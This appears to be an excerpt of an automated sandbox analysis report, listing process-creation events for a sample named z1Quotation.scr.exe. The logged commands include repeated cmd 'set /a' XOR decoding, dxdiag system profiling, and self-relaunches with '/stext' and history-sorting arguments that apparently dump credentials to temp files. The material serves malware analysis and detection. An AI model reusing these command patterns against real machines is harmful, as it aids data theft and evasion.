                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe "C:\Users\user\Desktop\z1Quotation.scr.exe"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 2348
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
